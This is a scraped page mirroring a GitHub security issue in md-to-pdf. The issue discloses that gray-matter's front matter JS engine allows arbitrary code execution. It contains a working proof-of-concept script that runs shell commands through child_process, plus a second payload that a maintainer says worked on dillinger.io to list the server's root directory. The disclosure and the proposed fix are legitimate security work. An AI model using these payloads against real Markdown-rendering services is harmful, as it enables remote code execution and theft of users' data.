Stuck on an issue?

Lightrun Answers was designed to reduce the constant googling that comes with debugging 3rd party libraries. It collects links to all the places you might be looking at while hunting down a tough bug.

And, if you’re still stuck at the end, we’re happy to hop on a call to see how we can help out.

Security: gray-matter exposes front matter JS-engine that leads to arbitrary code execution

See original GitHub issue

The library gray-matter (used by md-to-pdf to parse front matter) exposes a JS-engine by default, which essentially runs eval on the given Markdown.

https://github.com/simonhaenisch/md-to-pdf/blob/master/src/lib/md-to-pdf.ts#L26

Given that md-to-pdf is only a Markdown to PDF-library and looking at how other projects use it - I think it is an undesirable feature to be able to execute any arbitrary Javascript by anyone in control of the Markdown content.

A possible fix would be to override gray-matter’s JS-engine:

const { content: md, data: frontMatterConfig } = grayMatter(mdFileContent, { engines : { js : () => {} } } );

PoC:

$ cat /tmp/RCE.txt
cat: /tmp/RCE.txt: No such file or directory
$ node poc.js 
$ cat /tmp/RCE.txt
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu)

poc.js:

const { mdToPdf } = require('md-to-pdf');

var payload = '---js\n((require("child_process")).execSync("id > /tmp/RCE.txt"))\n---RCE';

(async () => {
	await mdToPdf({ content: payload }, { dest: './output.pdf' });
})();

Issue Analytics

State:
Created 2 years ago
Comments:6 (4 by maintainers)

Top GitHub Comments

5reactions

simonhaenischcommented, Sep 23, 2021

BTW I saw in your Github activity that you also raised an issue with dillinger.io which is using this package, and I’m actually able to use this exploit there, e. g. I would add a front matter like

---js
{
    css: `body::before { content: "${require('fs').readdirSync('/').join()}"; display: block }`,
}
---

and then use export > PDF. I’m not sure about the damage that can be done here but one idea would be to try and send myself all file exports that are happening in the hopes that someone uses dillinger.io for secret/internal data.

FYI @joemccann, I’ll see that I get a new major version out that disables this feature by default, and make a PR to your repo to update the package.

1reaction

magicOzcommented, Sep 22, 2021

The documentation seems to be a bit misleading and { language : '...' } actually just means the default engine if the language identifier is omitted from the front matter, all engines are still accessible by using ---<language identifier>.

Agree, an opt-in config option for which engines to use makes sense and sounds like the right way to solve this.

Top Results From Across the Web

CVE-2021-23639

Security : gray-matter exposes front matter JS-engine that leads to arbitrary code execution · Issue #99 · simonhaenisch/md-to-pdf · GitHub ...

Security Vulnerabilities (Execute Code) - CVE Details

# CVE ID CWE ID Vulnerability Type(s) Publish Date Update Date Score G... 6051 CVE‑2021‑24070 416 Exec Code 2021‑02‑25 2021‑03‑03 6.8 N... 6052 CVE‑2021‑24069 Exec...

Cyber Apocalypse CTF 2022 — Intergalactic Chase Write up

Security : gray-matter exposes front matter JS-engine that leads to arbitrary code execution · Issue… You can't perform that action at this time....

Solve Hack the Box and other CTF challenges with Snyk

The Snyk CLI allows you to run SAST (static application security ... by md-to-pdf to parse front matter) exposing a JS-engine by default....

Remote code execution vulnerability exposed in popular ...

Flaw allows remote attackers to inject arbitrary code due to insecure ... security vulnerability found in the serialize-javascript NPM ...